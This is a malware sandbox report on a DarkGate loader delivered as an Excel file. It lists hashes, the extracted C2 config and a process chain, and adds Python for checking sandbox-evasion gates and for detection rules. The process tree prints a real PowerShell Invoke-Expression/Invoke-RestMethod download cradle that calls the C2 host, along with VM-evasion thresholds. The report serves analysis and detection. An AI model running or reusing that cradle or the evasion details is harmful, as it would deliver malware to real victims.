Analysis
max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28/02/2024, 15:50
Static task: static1
Behavioral task: behavioral1
  Sample: scan-28-02-24_3136.xlsx
  Resource: win7-20240221-en
Note that the YARA hits and process tree reported further down are labelled behavioral2 and match the Windows 10 image named in the analysis metadata above, while the behavioral1 task listed here ran on the Windows 7 image.
General
Target: scan-28-02-24_3136.xlsx
Size: 29KB
MD5: 9d51efbfb3733f9e41a3ca833eecd843
SHA1: bfb4462b184d7cde4d382dd4104b721ac4b4ab8f
SHA256: abadc5f79d85d395c7760c93d635c885f4ea7cdf872986332c650ffbf2ad9984
SHA512: 955a1d6a7173dcac1d44374923530ca106d83afd7aa24b0aecd246b83d7cc94ea88b26f858717db858ef987769c1152ef79e18674c36699de3eca305519cbfa8
SSDEEP: 768:wnEQpllh7tAafroiianGoHoJ+yWWn0WhtEk:nQJh7Lro4ntD+0AEk
Malware Config
Extracted
Family: darkgate
Botnet (campaign ID): admin888
C2: cayennesxque.boo
Attributes:
  anti_analysis: true
  anti_debug: false
  anti_vm: true
  c2_port: 80
  check_disk: false
  check_ram: false
  check_xeon: false
  crypter_au3: false
  crypter_dll: false
  crypter_raw_stub: false
  internal_mutex: HwHLLNLY
  minimum_disk: 50
  minimum_ram: 7000
  ping_interval: 6
  rootkit: false
  startup_persistence: true
  username: admin888
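The check_ram / minimum_ram, check_disk / minimum_disk and check_xeon fields describe environment gates the payload can apply before running. In this sample all three are switched off (only anti_vm and anti_analysis are enabled, and the config does not spell out how those are implemented), but the thresholds are still present, and a sandbox operator wants to know whether their VM would survive them if a later build turns them on. The following is an added example, not code from the page or from the DarkGate author; it evaluates a host profile against these fields. The units (minimum_ram in MB, minimum_disk in GB) and the Xeon test being a substring match on ProcessorNameString, which AutoIt3.exe is seen querying in the signatures below, are assumptions drawn from public analyses, and STRICT_CONFIG and the two host profiles are constructed for illustration.

```python
from dataclasses import dataclass

# Environment-gating fields exactly as extracted on this page.
SAMPLE_CONFIG = {
    "check_ram": False, "minimum_ram": 7000,
    "check_disk": False, "minimum_disk": 50,
    "check_xeon": False,
}
# Constructed variant with every gate switched on (hypothetical, not from the page).
STRICT_CONFIG = {**SAMPLE_CONFIG, "check_ram": True, "check_disk": True, "check_xeon": True}


@dataclass(frozen=True)
class HostProfile:
    ram_mb: int     # total physical memory in MB (assumed unit of minimum_ram)
    disk_gb: int    # system drive capacity in GB (assumed unit of minimum_disk)
    cpu_name: str   # HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString


def failing_gates(cfg, host):
    """Return the enabled gates this host would fail, i.e. the reasons the payload would bail.

    Units and the substring semantics of check_xeon are assumptions (see lead-in).
    """
    failed = []
    if cfg.get("check_ram") and host.ram_mb < cfg["minimum_ram"]:
        failed.append(f"ram {host.ram_mb} MB < minimum_ram {cfg['minimum_ram']} MB")
    if cfg.get("check_disk") and host.disk_gb < cfg["minimum_disk"]:
        failed.append(f"disk {host.disk_gb} GB < minimum_disk {cfg['minimum_disk']} GB")
    if cfg.get("check_xeon") and "xeon" in host.cpu_name.lower():
        failed.append(f"processor name contains 'Xeon': {host.cpu_name!r}")
    return failed


def sandbox_floor(cfg):
    """Smallest profile that passes every numeric gate, enabled or not.

    Useful as a provisioning target: size the analysis VM above these values so a
    config that later flips the check_* flags on does not silently stop detonating.
    """
    return {
        "ram_mb": cfg["minimum_ram"],
        "disk_gb": cfg["minimum_disk"],
        "avoid_cpu_substring": "Xeon",
    }


# Constructed host profiles, not taken from the report.
SMALL_VM = HostProfile(ram_mb=4096, disk_gb=40, cpu_name="Intel(R) Xeon(R) CPU E5-2680 v4")
BIG_VM = HostProfile(ram_mb=16384, disk_gb=120, cpu_name="Intel(R) Core(TM) i7-9700 CPU")

if __name__ == "__main__":
    for label, cfg in (("sample config", SAMPLE_CONFIG), ("strict config", STRICT_CONFIG)):
        for host in (SMALL_VM, BIG_VM):
            print(label, host, "->", failing_gates(cfg, host) or "passes")
    print("provision at least:", sandbox_floor(SAMPLE_CONFIG))
```

With the page's own config the small VM passes because nothing is enabled; with every gate on, a 4 GB / 40 GB Xeon-labelled VM trips all three, which is why analysis images are commonly given 8 GB or more of RAM, a disk above 50 GB, and a consumer-style processor name string.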
Signatures

Detect DarkGate stealer (2 IoCs)
  resource | yara_rule
  behavioral2/memory/3732-63-0x0000000005840000-0x0000000005B8F000-memory.dmp | family_darkgate_v6
  behavioral2/memory/3732-65-0x0000000005840000-0x0000000005B8F000-memory.dmp | family_darkgate_v6
  Both hits are in the memory of PID 3732 (AutoIt3.exe), i.e. the unpacked payload, not the workbook or the VBS stage.

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2176 | 3448 | WScript.exe | 37
  The sample is an .xlsx, a format that cannot carry VBA macros; the report does not show which workbook feature caused EXCEL.EXE (PID 3448) to launch WScript.exe (PID 2176).

Blocklisted process makes network request (4 IoCs)
  flow | pid | Process
  40 | 4148 | powershell.exe
  42 | 4148 | powershell.exe
  43 | 4148 | powershell.exe
  53 | 4148 | powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely for geofencing.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | WScript.exe

Executes dropped EXE (1 IoC)
  pid | Process
  3732 | AutoIt3.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 5 IoCs)
Processor information is often read in order to detect sandbox environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AutoIt3.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | AutoIt3.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
  Office reads these keys during normal startup, so the EXCEL.EXE rows are expected; the ProcessorNameString read by the dropped AutoIt3.exe is the one that matters, and it lines up with the check_xeon field in the extracted config.

Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid | Process
  3448 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid | Process
  4148 | powershell.exe (4 occurrences)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description | pid | Process
  Token: SeDebugPrivilege | 4148 | powershell.exe

Suspicious use of SetWindowsHookEx (14 IoCs)
  pid | Process
  3448 | EXCEL.EXE (14 occurrences)

Suspicious use of WriteProcessMemory (7 IoCs)
  description | pid | Process | procid_target
  PID 3448 wrote to memory of 2176 | 3448 | EXCEL.EXE | 96 (2 occurrences)
  PID 2176 wrote to memory of 4148 | 2176 | WScript.exe | 97 (2 occurrences)
  PID 4148 wrote to memory of 3732 | 4148 | powershell.exe | 100 (3 occurrences)
  Every write here is from a parent into its own direct child, which is what CreateProcess itself does when setting up a new process; by itself this is not evidence of injection. The lineage it describes matches the process tree below.
Processes

1. C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 3448)
   Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scan-28-02-24_3136.xlsx"
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WScript.exe (PID 2176, child of 3448)
      Command line: "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs"
      - Process spawned unexpected child process
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4148, child of 2176)
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/jzpdvxcn')
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory

         4. C:\temp\AutoIt3.exe (PID 3732, child of 4148)
            Command line: "C:\temp\AutoIt3.exe" script.a3x
            - Executes dropped EXE
            - Checks processor information in registry
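The process tree above is the part of this report that translates most directly into detection logic: Excel launching a script host, the script host reading its script from a UNC path on a bare IP address, PowerShell running an Invoke-Expression(Invoke-RestMethod ...) download cradle, and an AutoIt interpreter executing a .a3x from C:\temp. The following is an added example, not code from the page or from any tool the page names; it runs four such rules over process-creation events and walks the parent chain back to the root. The event records are constructed from the command lines and PIDs shown above, with an explorer.exe root (PID 1000) and a benign PowerShell invocation (PID 5001) added as hypothetical rows so the rules have something to not fire on.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event, the shape Sysmon event 1 or an EDR feed provides."""
    pid: int
    ppid: int
    image: str
    cmdline: str


OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
# UNC path whose server component is a bare IPv4 address, e.g. \\147.45.197.186\share\scan.vbs
UNC_IP = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\")
# A download cradle needs an evaluator and a fetch primitive in the same command line.
EVALUATOR = re.compile(r"invoke-expression|\biex\b", re.I)
FETCHER = re.compile(r"invoke-restmethod|\birm\b|invoke-webrequest|\biwr\b|downloadstring", re.I)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, rule, detail) for every rule an event trips."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        pname = image_name(parent.image) if parent else ""
        if pname in OFFICE and name in SCRIPT_HOSTS:
            alerts.append((e.pid, "office_spawns_script_host", f"{pname} -> {name}"))
        unc = UNC_IP.search(e.cmdline)
        if name in {"wscript.exe", "cscript.exe", "mshta.exe"} and unc:
            alerts.append((e.pid, "script_host_runs_unc_ip_path", unc.group(1)))
        if name == "powershell.exe" and EVALUATOR.search(e.cmdline) and FETCHER.search(e.cmdline):
            alerts.append((e.pid, "powershell_download_cradle", e.cmdline))
        if name == "autoit3.exe" and not e.image.lower().startswith("c:\\program files"):
            alerts.append((e.pid, "autoit_interpreter_outside_program_files", e.image))
    return alerts


def lineage(events, pid):
    """Follow ppid links to the root and return image names root-first (cycle-safe)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


# Constructed from the report's process tree; PIDs 1000 and 5001 are hypothetical additions.
SAMPLE_EVENTS = [
    ProcEvent(1000, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(3448, 1000, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" '
              r'"C:\Users\Admin\AppData\Local\Temp\scan-28-02-24_3136.xlsx"'),
    ProcEvent(2176, 3448, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs"'),
    ProcEvent(4148, 2176, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command '''
              r'''Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/jzpdvxcn')'''),
    ProcEvent(3732, 4148, r"C:\temp\AutoIt3.exe", r'"C:\temp\AutoIt3.exe" script.a3x'),
    ProcEvent(5001, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Get-Date'),
]

if __name__ == "__main__":
    for pid, rule, detail in detect(SAMPLE_EVENTS):
        print(f"{pid:>5} {rule:<40} {detail}")
    print("lineage of 3732:", " -> ".join(lineage(SAMPLE_EVENTS, 3732)))
```

Two of the four rules fire on PID 2176 alone (Office parent and UNC-to-IP script path), which is the stage to alert on: by the time PID 4148 fetches from cayennesxque.boo the payload is already being staged, and the AutoIt3.exe rule is a last-resort catch for the unpacked stage the YARA hits identify.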
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

File 2
  Filesize: 872KB
  MD5: c56b5f0201a3b3de53e561fe76912bfd
  SHA1: 2a4062e10a5de813f5688221dbeb3f3ff33eb417
  SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
  SHA512: 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

File 3
  Filesize: 472KB
  MD5: 8e60a79c1b465ab143888b66f90cf5d6
  SHA1: b1177d88a91017bae0e2aafbf5d19acd505179bf
  SHA256: a08fc871fc74e01e2d877a4ba7aefc4951363d3b31fa5f6df4c03a33734107a6
  SHA512: 847da6254f3c7d51e3f7d39a13afab22f64272451be1c7d2df3df916e0df406bc0d6ab1b5623d777fddba715dfae0abe93c6cf5cef3eb173fd73aee888c767e8

File 4
  Filesize: 76B
  MD5: b7b976bcbbca1facd2941f6bdf2cb51e
  SHA1: 12a5b518283d72f43e73850327bf81d9456d8cc6
  SHA256: 0de3c9bae4138c45d98519686256df51f4f5724ff3483552fcb873403415c812
  SHA512: e055a38ffb8d70b441e58dfb7d748f197bf631ae4f5da1c8a9398a6d2b06a70ea7087d6756229b57ffc9e28aecebf7c2cd340c6cae91e726333450668c1dfa80